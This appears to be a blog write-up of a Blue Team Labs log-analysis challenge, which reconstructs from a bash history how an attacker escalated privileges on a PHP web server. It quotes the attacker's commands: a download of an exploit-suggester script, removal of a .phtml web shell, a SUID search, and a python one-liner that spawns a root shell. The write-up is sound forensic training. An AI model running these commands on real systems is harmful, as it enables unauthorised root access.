<!DOCTYPE html>
<html>

    <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
        <title> [ BTLO Challenge ] Log Analysis - Privilege Escalation &middot; user@james ~ $ </title>
        <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
<meta name="generator" content="Hugo 0.90.0" />




<script src="https://code.jquery.com/jquery-3.1.1.min.js"   integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="   crossorigin="anonymous"></script>


<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">

<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>


<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.2/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous">


<link rel="stylesheet" href="http://localhost:1313/css/nix.css">


<link rel="stylesheet" href="http://localhost:1313/css/styles.css">


<script src=http://localhost:1313/js/lunr-search.js></script>
<script src=http://localhost:1313/js/lunr.js></script>



<link rel="shortcut icon" href="http://localhost:1313/favicon.ico">



<link href="https://fonts.googleapis.com/css?family=Inconsolata%7COpen+Sans%7CConcert+One" rel="stylesheet">




<script async src="https://www.googletagmanager.com/gtag/js?id=G-4T1FV3DWGP"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-4T1FV3DWGP');
</script>



<script type="application/ld+json">
    {
        "@context" : "http://schema.org",
        "@type" : "BlogPosting",
        "mainEntityOfPage": {
             "@type": "WebPage",
             "@id": "http:\/\/localhost:1313\/"
        },
        "articleSection" : "articles",
        "name" : "[ BTLO Challenge ] Log Analysis - Privilege Escalation",
        "headline" : "[ BTLO Challenge ] Log Analysis - Privilege Escalation",
        "description" : "https:\/\/blueteamlabs.online\/home\/challenge\/4\nContents  Introduction Questions  What user (other than ‘root’) is present on the server? What script did the attacker try to download to the server? What packet analyzer tool did the attacker try to use? What file extension did the attacker use to bypass the file upload filter implemented by the developer? Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access?",
        "inLanguage" : "en-US",
        "author" : "",
        "creator" : "",
        "publisher": "",
        "accountablePerson" : "",
        "copyrightHolder" : "",
        "copyrightYear" : "2021",
        "datePublished": "2021-08-09 00:00:00 \u002b0000 UTC",
        "dateModified" : "2021-08-09 00:00:00 \u002b0000 UTC",
        "url" : "http:\/\/localhost:1313\/articles\/digital-forensics\/btlo-challenge-malicious-log-analysis\/",
        "wordCount" : "484",
        "keywords" : [ "Blog" ]
    }
</script>
    </head>

    <body>
        <header>
<nav class="navbar navbar-default navbar-fixed-top navbar-inverse font-header">
	<div class="container-fluid">
		<div class="navbar-header">
			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse-1" aria-expanded="false">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
      <a class="navbar-brand" id="green-terminal" href='http://localhost:1313/'>
        @james ~ $
      </a>
		</div>

		
		<div class="collapse navbar-collapse" id="navbar-collapse-1">
			<ul class="nav navbar-nav navbar-right">
				<li>
					<a href='http://localhost:1313/'>/home/</a>
        </li>
        
				
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/about">~/about</a>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/achievements">~/achievements</a>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
                        <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">articles <span class="caret"></span></a>
                    <ul class="dropdown-menu">
                        
                    		<li>
                    		<a href="http://localhost:1313/articles/digital-forensics">~/digital-forensics</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/offensive-security">~/offensive-security</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/operational-technology">~/operational-technology</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/reviews">~/reviews</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/articles/security-operations">~/security-operations</a>
				    		</li>
                		
            		</ul>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/notes">~/notes</a>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
                        <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">projects <span class="caret"></span></a>
                    <ul class="dropdown-menu">
                        
                    		<li>
                    		<a href="http://localhost:1313/projects/arduino">~/arduino</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/projects/bash">~/bash</a>
				    		</li>
                		
                    		<li>
                    		<a href="http://localhost:1313/projects/python">~/python</a>
				    		</li>
                		
            		</ul>
            		
        		</li>
        		
				
				<li class="dropdown">
                    
            		<a href="http://localhost:1313/search">~/search</a>
            		
        		</li>
        		

			</ul>
		</div>
	</div>
</nav>
</header>

        <div class="flex-wrapper">
            <div class="container wrapper single">
                <ol class="breadcrumb">
  
  
    
  
    
  
    
  
  <li>
    
      <a href="/">james</a>
    
  </li>

  
  <li>
    
      <a href="/articles/">articles</a>
    
  </li>

  
  <li>
    
      <a href="/articles/digital-forensics/">digital forensics</a>
    
  </li>

  
  <li>
    
      [ BTLO Challenge ] Log Analysis - Privilege Escalation
    
  </li>

</ol>



                <h1><a href="http://localhost:1313/articles/digital-forensics/btlo-challenge-malicious-log-analysis/">[ BTLO Challenge ] Log Analysis - Privilege Escalation</a></h1>
                <span class="post-date">2021-08-09 </span>
                <div class="post-content">
                    <p><a href="https://blueteamlabs.online/home/challenge/4" target="_blank">https://blueteamlabs.online/home/challenge/4</a></p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#introduction">Introduction</a></li>
<li><a href="#questions">Questions</a>
<ul>
<li><a href="#what-user-other-than-root-is-present-on-the-server">What user (other than ‘root’) is present on the server?</a></li>
<li><a href="#what-script-did-the-attacker-try-to-download-to-the-server">What script did the attacker try to download to the server?</a></li>
<li><a href="#what-packet-analyzer-tool-did-the-attacker-try-to-use">What packet analyzer tool did the attacker try to use?</a></li>
<li><a href="#what-file-extension-did-the-attacker-use-to-bypass-the-file-upload-filter-implemented-by-the-developer">What file extension did the attacker use to bypass the file upload filter implemented by the developer?</a></li>
<li><a href="#based-on-the-commands-run-by-the-attacker-before-removing-the-php-shell-what-misconfiguration-was-exploited-in-the-python-binary-to-gain-root-level-access-1--reverse-shell--2--file-upload--3--file-write--4--suid--5--library-load">Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access? 1- Reverse Shell ; 2- File Upload ; 3- File Write ; 4- SUID ; 5- Library load</a></li>
</ul>
</li>
</ul>
<h2 id="introduction">Introduction</h2>
<p>A server with sensitive data was accessed by an attacker and the files were posted on an underground forum. This data was only available to a privileged user, in this case the ‘root’ account. Responders say ‘www-data’ would be the logged in user if the server was remotely accessed, and this user doesn’t have access to the data. The developer stated that the server is hosting a PHP-based website and that proper filtering is in place to prevent php file uploads to gain malicious code execution. The bash history is provided to you but the recorded commands don’t appear to be related to the attack. Can you find what actually happened?</p>
<h2 id="questions">Questions</h2>
<p>We have a single file, <code>bash_history</code>. This is, as the name suggest, the history of commands run in the terminal (bash). This challenge is simply reading through the commands and understanding what they all do.</p>
<h3 id="what-user-other-than-root-is-present-on-the-server">What user (other than ‘root’) is present on the server?</h3>
<p>In Linux, user directories are located within <code>/home</code>. Looking through the logs, on line 21, we see:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">cd /home/daniel/
</code></pre></div><p>Change directory to daniel&rsquo;s home folder.</p>
<blockquote>
<p>daniel</p>
</blockquote>
<h3 id="what-script-did-the-attacker-try-to-download-to-the-server">What script did the attacker try to download to the server?</h3>
<p>We can simply look for scripts, URLs, or methods to download things via bash. Line 32:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
</code></pre></div><blockquote>
<p>linux-exploit-suggester.sh</p>
</blockquote>
<h3 id="what-packet-analyzer-tool-did-the-attacker-try-to-use">What packet analyzer tool did the attacker try to use?</h3>
<p>What&rsquo;s the most common packet analyser tool for the command line? Line 47:</p>
<blockquote>
<p>tcpdump</p>
</blockquote>
<h3 id="what-file-extension-did-the-attacker-use-to-bypass-the-file-upload-filter-implemented-by-the-developer">What file extension did the attacker use to bypass the file upload filter implemented by the developer?</h3>
<p>Here we can look for uploads for files (with file extensions). Right at the end, line 63, there is a remove command for deleting a file within an uploads folder:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">rm /var/www/html/uploads/x.phtml
</code></pre></div><blockquote>
<p>.phtml</p>
</blockquote>
<h3 id="based-on-the-commands-run-by-the-attacker-before-removing-the-php-shell-what-misconfiguration-was-exploited-in-the-python-binary-to-gain-root-level-access-1--reverse-shell--2--file-upload--3--file-write--4--suid--5--library-load">Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access? 1- Reverse Shell ; 2- File Upload ; 3- File Write ; 4- SUID ; 5- Library load</h3>
<p>Python is mentioned on line 62:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">./usr/bin/python -c <span style="color:#e6db74">&#39;import os; os.execl(&#34;/bin/sh&#34;, &#34;sh&#34;, &#34;-p&#34;)&#39;</span>
</code></pre></div><p>Immediately before this, line 61, there is a <code>find</code> command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">find / -type f -user root -perm -4000 2&gt;/dev/null
</code></pre></div><p>This find looks for files (<code>-type f</code>) owned by root (<code>-user root</code>) with permissions of 4000 (<code>-perm -4000</code>) - relates to SUID files.</p>
<blockquote>
<p>4</p>
</blockquote>

                </div>
                
                <div class="post-comments">
                    
                </div>
                
            </div>
            <footer class="footer text-center">
<p>Copyright &copy; 2022 James -
<span class="credit">
	Powered by
	<a target="_blank" href="https://gohugo.io">Hugo</a>
	and
	<a target="_blank" href="https://github.com/LordMathis/hugo-theme-nix/">Nix</a> theme.
</span>
</p>
</footer>

        </div>
    </body>
